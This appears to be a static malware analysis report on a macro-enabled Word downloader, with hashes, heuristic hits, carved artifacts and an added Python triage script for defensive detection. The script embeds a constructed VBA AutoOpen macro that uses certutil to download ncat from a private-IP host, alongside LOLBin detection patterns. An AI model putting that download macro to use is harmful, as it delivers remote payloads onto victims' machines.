Malicious Office (OOXML) / .DOC — malware analysis report

Static analysis result for SHA-256 429a45350a533940…

MALICIOUS

Office (OOXML) / .DOC

Size: 21.5 KB
Created: 2021-06-03 14:32:00 UTC
Authoring application: Microsoft Office Word 16.0000
MD5: bf595b796319d1db0d0372a4b4bb0ee6
SHA-1: 97528c6f47fbaa48d14320577d59d394e9abe20d
SHA-256: 429a45350a5339406971ca89fa24781705486cf2f02e3effab42844a4593ed75
Risk Score: 522

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1059.003 Command and Scripting Interpreter: Windows Command Shell
T1218 Signed Binary Proxy Execution

The document carries a VBA project whose entry point is an AutoOpen procedure, so the macro runs as soon as a user opens the file and enables content. The macro instantiates WScript.Shell and invokes cmd.exe; together with the ClamAV signature on the carved VBA project, Win.Downloader.CertutilURLCache-6335698-0, this points to the certutil "-urlcache" download pattern, in which a signed Windows binary is abused to fetch a second-stage payload. The only non-namespace URL extracted from the document, http://192.168.2.120/ncat1.exe, sits on an RFC 1918 private address, which is unreachable from the internet and, with the "TEST2" token in the filename, is consistent with a lab or test build rather than a live campaign. Tokens in the reconstructed filename 'certutil2_0_58_only_certutil_TEST2_cores_exact_filename_badtask_username.docm' (cores, exact_filename, username) suggest the macro gates execution on CPU core count, its own filename and the current user name, checks commonly used to evade sandboxes; none of the heuristics below confirms this independently, so treat it as a lead to verify in the decoded macro source rather than an established finding.

Heuristics (12)

  • OLE_VBA_SHELL (critical): Shell() call in VBA
  • OLE_VBA_WSCRIPT (critical): WScript.Shell usage
  • OLE_VBA_LOLBIN (critical): LOLBin reference in VBA
  • CLAMAV_DETECTION (critical): ClamAV detected this file as malware: Win.Downloader.CertutilURLCache-6335698-0
  • EXTRACTED_FILE_CLAMAV (critical): ClamAV flagged at least one file extracted from inside this sample. Even when the wrapping document carries no AV detection of its own, a hit on the carved artifact is a strong indicator that the sample is a delivery vehicle.
  • OLE_VBA_AUTOOPEN (high): AutoOpen macro
  • OLE_VBA_CREATEOBJ (high): CreateObject call
  • OLE_VBA_GETOBJ (high): GetObject call
  • OLE_VBA_CMD (high): cmd.exe reference in VBA
  • EXTRACTED_FILE_STATIC_TRIAGE (high): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • OOXML_VBA (medium): Document contains word/vbaProject.bin, so VBA macros are present.
  • EMBEDDED_URL (info): One or more URLs were extracted from the document. A URL by itself is not a detection; the per-URL channel label (macro, JS, link annotation, document body, ...) says which part of the file reached it.
    Actionable URL:
    • http://192.168.2.120/ncat1.exe (matches the certutil URL-cache download pattern named by the ClamAV signature; 192.168.2.120 is an RFC 1918 private address, so it cannot be reached from the internet and is consistent with a lab or test build)
    XML namespace URIs (OOXML schema declarations present in any Word document; not network indicators and safe to exclude from IOC lists):
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.microsoft.com/office/drawing/2014/chartex
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2012/wordml
    • http://schemas.microsoft.com/office/word/2015/wordml/symex
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape
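The following script is an added worked example, not the analysis engine's code, showing how the heuristic IDs above and the URL-channel distinction can be reproduced offline with the Python standard library. The .docm container and the VBA text it triages are constructed for the example and are not this sample's content; the regex patterns behind each heuristic ID, the set of namespace hosts, and the "private-ip" label are assumptions chosen here. Decompressing a real word/vbaProject.bin is left to oletools' olevba (the extraction source the report names), so the decoded macro text is passed in as a string.

```python
"""Offline triage of a macro-enabled OOXML document, modelled on the heuristic IDs
in this report. Sample document, sample VBA, regexes and labels are constructed
for the example; they are not the analysis engine's or the sample's own code."""
import io
import ipaddress
import re
import zipfile
from urllib.parse import urlparse

# Constructed word/document.xml: only namespace declarations, which is where most
# "URLs" in any .docm come from.
DOCUMENT_XML = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"'
    ' xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"'
    ' xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml">'
    '<w:body><w:p><w:r><w:t>Enable content to view this document.</w:t></w:r></w:p></w:body>'
    '</w:document>'
)

# Constructed VBA standing in for what olevba would decode from vbaProject.bin.
# It mirrors the pattern the heuristics describe (AutoOpen, WScript.Shell, cmd.exe,
# certutil -urlcache); it is NOT the sample's actual macro.
SAMPLE_VBA = r'''
Sub AutoOpen()
    Dim o As Object
    Set o = CreateObject("WScript.Shell")
    o.Run "cmd.exe /c certutil -urlcache -split -f http://192.168.2.120/ncat1.exe %TEMP%\n.exe", 0
End Sub
'''

VBA_HEURISTICS = [
    # (heuristic id from the report, severity from the report, pattern assumed here)
    ("OLE_VBA_AUTOOPEN", "high", re.compile(r"\b(AutoOpen|Auto_Open|Document_Open|Workbook_Open|AutoExec)\b", re.I)),
    ("OLE_VBA_SHELL", "critical", re.compile(r"\bShell\s*\(", re.I)),
    ("OLE_VBA_WSCRIPT", "critical", re.compile(r"WScript\.Shell", re.I)),
    ("OLE_VBA_CREATEOBJ", "high", re.compile(r"\bCreateObject\s*\(", re.I)),
    ("OLE_VBA_GETOBJ", "high", re.compile(r"\bGetObject\s*\(", re.I)),
    ("OLE_VBA_CMD", "high", re.compile(r"\bcmd(\.exe)?\b", re.I)),
    ("OLE_VBA_LOLBIN", "critical", re.compile(r"\b(certutil|mshta|regsvr32|rundll32|bitsadmin|msiexec)\b", re.I)),
]
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)
# Hosts that appear inside Office files only as XML namespace URIs (assumed list).
SCHEMA_HOSTS = {"schemas.openxmlformats.org", "schemas.microsoft.com", "www.w3.org"}


def build_sample_docm() -> bytes:
    """Constructed minimal .docm: a ZIP holding document.xml and a placeholder vbaProject.bin."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("word/document.xml", DOCUMENT_XML)
        # OLE compound-file magic plus padding; a real one holds compressed VBA streams.
        z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 64)
    return buf.getvalue()


def classify_url(url: str) -> str:
    """Label a URL so namespace noise can be separated from real indicators."""
    host = (urlparse(url).hostname or "").lower()
    if host in SCHEMA_HOSTS:
        return "schema-namespace"
    try:
        if ipaddress.ip_address(host).is_private:
            return "private-ip"  # RFC 1918 / loopback: lab or internal staging
    except ValueError:
        pass  # hostname rather than an IP literal
    return "external"


def triage_ooxml(blob: bytes, decoded_vba: str = "") -> dict:
    """Return heuristic hits and per-channel URLs. decoded_vba is the macro text olevba
    would recover; decompressing vbaProject.bin itself is outside this example."""
    findings, urls = [], []
    with zipfile.ZipFile(io.BytesIO(blob)) as z:
        names = z.namelist()
        if "word/vbaProject.bin" in names:
            findings.append(("OOXML_VBA", "medium"))
        for name in names:
            if name.endswith((".xml", ".rels")):
                text = z.read(name).decode("utf-8", "replace")
                urls += [(u, "document-xml", classify_url(u)) for u in URL_RE.findall(text)]
    for hid, severity, pattern in VBA_HEURISTICS:
        if pattern.search(decoded_vba):
            findings.append((hid, severity))
    urls += [(u, "macro", classify_url(u)) for u in URL_RE.findall(decoded_vba)]
    return {"findings": findings, "urls": urls}


def actionable_urls(result: dict) -> list:
    """Drop namespace URIs so only URLs worth blocking or pivoting on remain."""
    return [u for u in result["urls"] if u[2] != "schema-namespace"]


if __name__ == "__main__":
    result = triage_ooxml(build_sample_docm(), SAMPLE_VBA)
    for hid, severity in result["findings"]:
        print(f"[{severity}] {hid}")
    for url, channel, label in actionable_urls(result):
        print(f"URL {url} via {channel} ({label})")
```

On the constructed input the script reports OOXML_VBA plus the AutoOpen, WScript.Shell, CreateObject, cmd.exe and LOLBin heuristics, while OLE_VBA_SHELL and OLE_VBA_GETOBJ stay silent because that macro never calls Shell() or GetObject(); the three document.xml URLs are all labelled schema-namespace and only the macro's staging URL survives as actionable, tagged private-ip. For a real sample, replace SAMPLE_VBA with the output of olevba and keep the URL classification, since signature-free URL lists from OOXML are dominated by exactly this namespace noise.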

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Artifact 1: macros.bas
  SHA-256: 8b9c8cdd7197d68c643687d300e4b5d4fd16f5e22e9d2fb961b1d6de25d698a5
  Kind: vba-macro
  Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
  Size: 3132 bytes
  Detection:
    ClamAV: No threats found
    Obfuscation or payload: likely
    Carved artifact contains 2 shell/COM execution token(s). Carved macro source contains an auto-exec entry point and execution/download terms.

Artifact 2: vbaProject_00.bin
  SHA-256: 7c492a274b76e6ce51d74b03b9794da50bf1147c8de4fe2786fb7ea739300aed
  Kind: vba-project
  Source: OOXML VBA project: word/vbaProject.bin
  Size: 23552 bytes
  Detection:
    ClamAV: Win.Downloader.CertutilURLCache-6335698-0
    Obfuscation or payload: likely
    Carved artifact contains 2 shell/COM execution token(s). Carved macro source contains an auto-exec entry point and execution/download terms.

Note that the ClamAV signature fires on the VBA project container (vbaProject_00.bin) but not on the decoded source (macros.bas). That is expected when a signature keys on bytes of the compressed project stream rather than on the decoded text, so the clean verdict on macros.bas does not weaken the detection; the decoded source is the artifact to read when confirming the download command and any environment checks.